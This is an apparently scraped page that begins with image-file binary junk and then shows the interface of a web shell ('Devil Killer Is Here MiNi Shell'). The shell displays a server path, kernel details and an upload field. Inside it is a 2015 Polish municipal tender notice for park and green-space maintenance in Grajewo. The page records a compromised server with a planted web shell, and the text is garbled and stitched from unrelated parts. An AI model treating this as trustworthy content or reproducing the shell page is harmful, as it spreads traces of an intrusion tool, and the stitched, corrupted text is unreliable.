JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150127/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150127/11467-N-2015.html

<p class="kh_header"><b>Grajewo: Pielęgnacja zieleni miejskiej w mieście Grajewo w okresie 01.03.2015 - 30.11.2015</b><br>
<b>Numer ogłoszenia: 11467 - 2015; data zamieszczenia: 27.01.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Miasta Grajewo , ul. Strażacka 6A, 19-200 Grajewo, woj. podlaskie, tel. 86 273 0 800, faks 86 273 0 803.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.grajewo.pl; bip.um.grajewo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pielęgnacja zieleni miejskiej w mieście Grajewo w okresie 01.03.2015 - 30.11.2015.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonywanie pielęgnacji zieleni miejskiej w mieście Grajewo w okresie 01.03.2015 - 30.11.2015 r.
W ramach pielęgnacji i bieżącego utrzymania terenów zieleni miejskiej należy objąć utrzymaniem wszystkie urządzone tereny i obiekty, w tym również stawy i rowy w parku Central.  
Szczegółowy zakres utrzymania zieleni miejskiej w 2015 roku obejmuje: 
1) konserwację i bieżące utrzymanie niżej wymienionych obiektów: 
a) parki położone na terenie miasta, w tym:
- park przy ul. Strażackiej                                                        -    18.525 m 2
- park przy ul. Nowickiego                                                        -     4.900 m 2 
- park przy Urzędzie Miasta                                                      -     5.340 m 2     
- park i plac zabaw oraz teren wokół budynku nr 61B przy ul. Wojska  
  Polskiego                                                                       -    11.800m 2          
b) park CENTRAL, w tym:
-    pielęgnację i konserwację łąk i trawników          -             ok. 40.000  m2 ,
-    odchwaszczanie i oczyszczanie alejek żwirowych  -           ok.  6.400  m2 ,
-    pielęgnację drzew - utrzymanie tzw. czarnego ugoru w obrębie drzew, 
-    wywożenie śmieci z koszy, 
-    letnie utrzymanie we właściwym stanie alejek parkowych (z  wyłączeniem       zimowego utrzymania alejki głównej w parku Central - w okresie  od 1 marca do      30 kwietnia), 
-   konserwację stawów i rowów położonych na terenie parku, w tym:
*  koszenie skarp rowów oraz dna rowów                            -  na bieżąco,
*  koszenie skarp stawów                                                 -  na bieżąco,
*  usuwanie namułów z dna rowów                                     -  w miarę potrzeby,
*  oczyszczanie stawów i rowów z nieczystości stałych         - na bieżąco,
*  usuwanie awarii drenarskich                                          -  w miarę potrzeby,
*  odmulanie studzienek drenarskich                                   -  w miarę potrzeby, 
*  usuwanie rzęsy z lustra wody w stawach                         -  na bieżąco,	
*  utrzymanie w należytym stanie zasuwy spustowej             -  na bieżąco,
*  zbieranie i wywożenie na bieżąco nieczystości stałych z  terenu parku.
c) trawniki, skwery i  zieleńce, w tym:
- skwer na Pl. Niepodległości                                                -     2.000 m2  
- trawniki przy ul. Grunwaldzkiej                                           -        669 m2 
- trawniki przy klubie Hades  i parking trawiasty                      -     1.920 m2
- trawniki przy scenie estradowej przy klubie Hades                 -     6.000 m2
- zieleniec przy ul. Dwornej  i Wilczewo                                 -        836 m2
- trawniki na os. Południe przy bloku Nr 3                              -      1.500 m2
- zieleniec przy ul. Dwornej i Wesołej                                    -        630 m2
- trawniki przy ul. Mickiewicza                                             -     1.400 m2
- trawniki przy ul. Konstytucji 3-go Maja  i Nowo Osiedle          -        400 m2
- trawniki przy ul. Targowej                                                -        500 m2
- trawniki przy ul. 9 PSK                                                    -     4.200 m2
- trawniki przy ul. Wojska Polskiego w rejonie MDK oraz na skarpach przy schodach    MDK  wraz z krzewami i kwiatami                                     -     1.800 m2
- trawnik przy szalecie miejskim ul. Piłsudskiego                     -        100 m2
- trawniki przy ul. Konstytucji 3 Maja pomiędzy ulicą a parkingiem TBS - 2.200  
  m2                                                                                                   
- zieleniec i trawniki przy ul. Pułaskiego                                -      3.600 m2
- skwer  przy ul. Nowo Osiedle                                           -           50 m2  
- skwer  przy ul. Popiełuszki                                               -           50 m2  
- skwer i trawniki  przy przedszkolu Nr 6 na os. Południe          -         850 m2  
- trawniki przy ul. Ekologicznej                                           -       2.500 m2  
- trawniki przy ul. Ks Pęzy                                                 -      1.200 m2 
- trawniki przy ul. Konopnickiej, Łąkowej, Słonecznej, Kolejowej  -   1.800 m2
- trawniki przy ul. Dwornej                                                   -      2.000 m2 
- trawniki przy ul. Nowickiego i skrzyżowaniu z ul. Kilińskiego i Traugutta - 450 m2
- trawniki przy ul. Kolejowej                                                  -      200 m2
   - trawniki przy ul. Proletariackiej o pow. ok. 800m2 -  wygrabianie trawników, zbieranie i wywóz nieczystości, koszenie w 2 okresach - do końca maja i do końca sierpnia
- trawniki przy ul. Krasickiego (Przedszkole Nr 2) - 200 m2
pozostałe miejskie tereny zieleni urządzonej, w tym m.in.:
- tereny rekreacyjne położone pomiędzy ul. Legionistów a torami PKP, 
na działce Nr 4603/1                                                             -     20.000 m2  
-  boisko przy ul. Ks. Pęzy                                                      -      1.550 m2
-  boisko za parkingiem na Oś. Centrum                                     -      3.000 m2      

Zakres robót przy obiektach, wymienionych w punkcie 1, polega na:
          a) utrzymaniu należytego stanu darni poprzez systematyczne koszenie, podlewanie i nawożenie,     
          b) utrzymaniu czystości i porządku  poprzez wygrabianie trawników, zbieranie i wywóz nieczystości,
          c) odsiewaniu trawy w miejscach wydeptanych                -     ok. 200 m2     
          d) obsadzaniu i pielęgnacji rabat kwiatowych na skwerkach i w gazonach ok. 800 m2, - prace polegają na wykonywaniu nasadzeń kwiatowych w ilości 9000 szt. w miesiącach: kwiecień - maj - pierwsze nasadzenie, czerwiec - lipiec - drugie nasadzenie oraz ich pielęgnacji w okresie wegetacji. Miasto Grajewo zabezpieczy sadzonki kwiatów. Schemat nasadzeń należy uzgodnić z pracownikiem Zamawiającego.
Miejsca nasadzeń :  
- parki miejskie, skwery i trawniki na skrzyżowaniu dróg krajowych i przy Placu          Niepodległości,
-  teren przed Urzędem Miasta, przy ul. Mickiewicza, Nowickiego, 
-  zieleniec przed MDK (ul. Wojska Polskiego).    
                                       
2)  utrzymanie właściwej estetyki terenów nieurządzonych stanowiących mienie miejskie a) położonych pomiędzy  Osiedlem Młodych, a ul. Kopernika  na działkach nr 3963, 3964/9, 1611/6, 1607/3, 3962, 3961) - utrzymanie polega na wykaszaniu trawy, chwastów i zbieraniu śmieci, pielęgnacji drzewek posadzonych w 2014 roku,
b) położonych na os. Centrum w sąsiedztwie parkingu za kościołem i bloków mieszkalnych na działce nr 1061/11 - utrzymanie polega na wykaszaniu trawy i chwastów oraz zbieraniu śmieci,
c) zieleni przydrożnej nieurządzonej i rowów w pasach wszystkich dróg miejskich, w szczególności - przy ul. Konopnickiej, Łąkowej, Działkowej, Kolejowej, Wiktorowo,  Ekologicznej (od ul. Kopernika do ul. Wiktorowo i od ul. Elektrycznej do ul. Topolowej), Elektrycznej, ul. 9-ego PSK, Robotniczej, Grunwaldzkiej, Dwornej, Wyzwolenia, Lipowej, Rzemieślniczej, Wiejskiej, Ks. Pęzy (do ogródków działkowych i przepompowni ścieków), 23 - Stycznia, Wilczewo, Sienkiewicza, Wierzbowej,  11-go Listopada, Sadowej, Rolnej, Bocznej, Partyzantów, Wąskiej, Braci Świackich, 	Legionistów - utrzymanie polega na wykaszaniu trawy i chwastów i zbieraniu śmieci, z tym że pasy drogowe dróg gruntowych należy wykosić 2 razy - do końca maja i do końca sierpnia, a przy drogach o nawierzchni ulepszonej trawniki i rowy należy wykaszać na bieżąco stosownie do wzrostu traw i chwastów, nie rzadziej niż raz w miesiącu;
d) skarp na os. Broniewskiego i os. 1000-lecia przy zjeździe do parku Central -         utrzymanie polega na wykaszaniu trawy i chwastów i zbieraniu śmieci
e) położonych na os. Południe przy garażach przy łączniku ul. 9 Pułku Strzelców Konnych - działki nr 2042/9, 2043/14, 4417 - pow. ok. 1,5 ha - utrzymanie polega na  sukcesywnym zbieraniu śmieci oraz wykaszaniu trawy i chwastów w 2 okresach - do końca maja i do końca sierpnia,
f) położonych  przy drodze wewnętrznej (działka nr 2031/70 - droga żwirowa od ul. 9 Pułku Strzelców Konnych) po obu stronach drogi - pow. ok. 1,5 ha - utrzymanie polega na  sukcesywnym zbieraniu śmieci oraz wykaszaniu trawy i chwastów,
g) położonych przy drodze wewnętrznej DP1 oraz na os. Południe pomiędzy budynkami TBS, Zespołem Szkół Zawodowych i ul. Ekologiczną - łącznie pow. ok. 1,7 ha - utrzymanie polega na  sukcesywnym zbieraniu śmieci oraz wykaszaniu trawy i chwastów w 2 okresach - do końca maja i do końca sierpnia,
h) terenów położonych pomiędzy zabudową jednorodzinną przy ul. Baczyńskiego,     Pracowniczymi Ogrodami Działkowymi im. H. Sawickiej, a przepompownią                 ścieków i ul. Ks. Pęzy na działkach nr 853, 839, 855, 849 -  utrzymanie polega  na  sukcesywnym zbieraniu śmieci oraz wykaszaniu trawy i chwastów,
i) terenów położonych przy garażach na ul. Ekologicznej przy miejskiej oczyszczalni    ścieków - utrzymanie polega  na  sukcesywnym zbieraniu śmieci oraz wykaszaniu trawy i chwastów,
j) boisko na os. 1000-lecia (działka nr 1816/19 i 1816/20) - 1.800 m2,, plac przy garażach - ul. Strażacka 17 -  360 m2  - utrzymanie polega  na  sukcesywnym zbieraniu śmieci.
k) terenów położonych na os. 1000-lecia, na wysokości bloków 6 i 7 oraz pomiędzy blokami nr 3 i 4 - 1000 m2 - utrzymanie polega  na  sukcesywnym zbieraniu śmieci oraz wykaszaniu trawy i chwastów.
l) terenów położonych przy ul. Wojska Polskiego na działkach miejskich oznaczonych Nr 2031/134, 2031/137, 2031/135, 2031/144, 2031/143, 2031/142, 2031/141, 2031/140, 2031/150, 2031/149, 2031/38, 2031/148, 2031/147, 2031/155, 2031/156, 2031/157, - utrzymanie polega  na  sukcesywnym zbieraniu śmieci oraz wykaszaniu trawy i chwastów oraz na wygrabieniu terenów z liści i przesadzeniu 50 szt. sadzonek drzew (dębów) w miejsce wskazane przez pracownika Zamawiającego, 
3) Utrzymanie drzew i krzewów rosnących przy ulicach będących drogami  miejskimi oraz na terenie parków, polegające na:
a) dokonaniu cięć pielęgnacyjnych - 200 szt. drzew wskazanych przez pracownika Zamawiającego, rosnących w parkach, przy ul. Parkowej, Konstytucji 3 Maja, Szkolnej, Mickiewicza, Strażackiej, Nowickiego, 11-Listopada, na terenach miejskich po jednostce wojskowej (na działkach oznaczonych Nr 2031/134, 2031/137, 2031/135, 2031/144, 2031/143, 2031/142, 2031/141, 2031/140, 2031/150, 2031/149, 2031/38, 2031/148, 2031/147, 2031/155, 2031/156, 2031/157),  
b) usuwaniu odrostów przy drzewach,
c) utrzymaniu w obrębie drzew tzw. czarnego ugoru,
d) wycince uszkodzonych drzew (powstałych na skutek ekstremalnych zjawisk atmosferycznych) położonych na terenach miejskich,                                     
4) Pielęgnację żywopłotów znajdujących się :
   a)    przy Urzędzie Miasta                                                              -   500 mb
   b)    w parku  przy ul. Wojska Polskiego                                            -  180 mb
   c)    przy klubie Hades                                                                  -  150 mb
   d)   przy szalecie miejskim                                                             -    70 mb
Pielęgnacja żywopłotów polega na podcinaniu i formowaniu na bieżąco, utrzymywaniu tzw. czarnego ugoru w pasie żywopłotu, podlewaniu i nawożeniu  żywopłotów.  
5) Pielęgnację posadzonych w 2014 roku drzew przy ul. Ekologicznej, na terenach parków, na terenach w rejonie tzw. strzelnicy wojskowej i kościoła pw. MBNP, w rejonie os. Młodych,  wskazanych przez uprawnionego pracownika Urzędu Miasta. Pielęgnacja polega na odchwaszczaniu, podlewaniu i nawożeniu.
6) Oczyszczenie i odchwaszczenie alejek wykonanych z płytek chodnikowych i polbruku oraz alejek żwirowych w parkach i na zieleńcach w okresie letnim, a w okresie zimowym -  odśnieżanie i posypywanie piaskiem.   
Powierzchnia alejek:
  a)   skwer przy Pl. Niepodległości                                                   -     660 m 2
  b)   park przy ul. Strażackiej                                                         -   2.950 m 2
  c)   park przy ul. Nowickiego                                                        -     460 m 2
  d)   park przy ul. Wojska Polskiego                                                -   2.880 m 2
  e)   skarpa przy cmentarzu komunalnym ul. Pułaskiego                      -     400 m 2
  f)   park przy Urzędzie Miasta (z wyłączeniem placu i chodników przed      budynkiem)                                                  - 800 m2                                      
7) Renowację istniejących trawników, m.in.: w parkach, przy Urzędzie Miasta,
- ogółem ok. 500 m2 
8) Założenie trawników:
- ul. Sportowa - wyrównanie terenu, wysiew trawy, pielęgnacja - pow. ok. 250 m 2
- ul. Orzeszkowej - wyrównanie terenu, wysiew traw, pielęgnacja - pow. ok. 250 m 2
9) Posadzenie 50 szt. sadzonek (drzew i krzewów) na terenie miasta w miejscach   wskazanych przez upoważnionego pracownika Urzędu Miasta, m.in. na działkach Nr 871 - 10 szt., na działkach Nr 4608/2, 4608/3 - 31 szt, . Przewiduje się nasadzenie w miejscach wyciętych drzew oraz uzupełnienie nasadzeń w parkach  miejskich i ciągach dróg miejskich.  Miasto Grajewo zabezpieczy sadzonki drzew i krzewów. 
10) Zawieszenie na słupach oświetleniowych 9 kpl. kwietników i nasadzenie w nich oraz pielęgnowanie kwiatów w ilości ok. 25 szt. na jeden kwietnik - kwietniki i żel dostarczy Zamawiający, kwiaty również zakupi Zamawiający,
11) Remont ławek parkowych, oznakowań i urządzeń w parkach miejskich.
Zakres prac obejmuje:
a) remont ławek w tym uzupełnienie brakujących listew siedzisk i oparć oraz naprawę  wraz z pomalowaniem - w okresie do 15 maja, 
b) remont tablic informacyjnych, 
c) remont urządzeń parkowych służących do zabawy i odpoczynku, w tym  naprawę wraz z pomalowaniem - w okresie do 15 maja,
12) Roboty zapewniające utrzymanie warunków bezpieczeństwa w ruchu drogowym, w tym:              
a) utrzymanie trójkątów widoczności na skrzyżowaniach dróg                                                                  
b) wycinanie gałęzi i krzewów oraz koszenie trawy i chwastów w pasach drogowych dróg  miejskich,
c) utrzymanie widoczności znaków drogowych przy ulicach miejskich.
14) Dostarczenie, ustawienie 3 szt. choinek: na Placu Niepodległości i przed Urzędem Miasta..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 77.31.41.00-5, 77.34.00.00-5, 77.31.21.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 9.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający będzie żądał wpłacenia wadium na następujących zasadach: 
Wadium - może być wniesione w: pieniądzu, poręczeniach oraz gwarancjach bankowych, gwarancjach ubezpieczeniowych, zastawach na papierach wartościowych emitowanych lub gwarantowanych przez Skarb Państwa. 
Wadium wniesione w pieniądzu Zamawiający będzie przechowywał na rachunku bankowym. 
Ustala się wysokość wadium na kwotę 7 000 zł (słownie: siedem tysięcy złotych).
Przelew gotówkowy za wadium należy wpłacić na konto w Banku Spółdzielczym nr:
56 8768 1013 1300 1951 2000 0040</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie mogą ubiegać się Wykonawcy, którzy spełniają następujące warunki:
      1. określone przepisami art. 22 ust. 1 pkt 1-3 ustawy,
      2. nie podlegają wykluczeniu z postępowania na podstawie przepisów art. 24 ust. 1 i 2 ustawy,
      3. posiadają odpowiednie zezwolenia na wykonywanie czynności będące przedmiotem zamówienia, w tym:
- zezwolenie starosty na zbieranie i transport odpadów na terenie gminy miejskiej Grajewo;
4. mają doświadczenie w wykonaniu prac odpowiadających swoim rodzajem i wartością robotom stanowiącym przedmiot zamówienia i wykonali w okresie ostatnich trzech lat (2012-2014), należycie zgodnie z wymogami obowiązującego prawa co najmniej 2 zamówienia o podobnym rodzaju robót i wartości nie mniejszej niż przedmiotowe zamówienie lub co najmniej jedno zamówienie wykonywane cyklicznie w okresie co najmniej 2 lat - załączą wykaz zrealizowanych zamówień w okresie ostatnich 3 lat, wraz z dokumentami potwierdzającymi, że zamówienia wymienione w wykazie, o którym mowa zostały wykonane lub są wykonywane należycie.
      
Zamawiający dokona oceny spełnienia tych warunków poprzez sprawdzenie kompletności (co do ilości i treści) dokumentów załączonych do oferty.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz wykonywanych w ciągu ostatnich 3 lat zamówień tożsamych z przedmiotem niniejszego zamówienia. W wykazie należy podać nazwę przedsięwzięcia, wartość oraz okres realizacji i nazwę zamawiającego - zgodnie z załącznikiem 2c.
Wykaz powinien zawierać minimum 2 przedsięwzięcia o podobnym do niniejszego     zamówienia rodzaju robót i wartości lub jedno wykonywane cyklicznie w okresie co najmniej 2 lat. Zsumowane wartości wykonanych zamówień, potwierdzonych że zostały wykonane należycie, będą podlegały ocenie w kryterium
B - Doświadczenie zawodowe.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz sprzętu jakim dysponuje Wykonawca, a który jest niezbędny i przystosowany do właściwego wykonania przedmiotu zamówienia (zał. nr 2b). 
Wykonawca winien dysponować równocześnie:
min. 5 kosiarkami samojezdnymi (traktorki) do koszenia trawy lub 10 kosiarkami spalinowymi (przyjmując równoważnik 2 kosiarki za 1 kosiarkę samojezdną), 
min. 1 pojazdem bezpylnym do wywozu śmieci z koszy parkowych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>



<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 98</li>
<li>2 - doświadczenie zawodowe - 2</li>
</ul>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.um.grajewo.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Grajewo
ul. Strażacka 6
19 - 200 Grajewo
(Wydział Gospodarki Komunalnej, pokój nr 29).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.02.2015 godzina 12:00, miejsce: Urząd Miasta Grajewo
ul. Strażacka 6A
19 - 200 Grajewo
(Sekretariat, pokój Nr 21).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com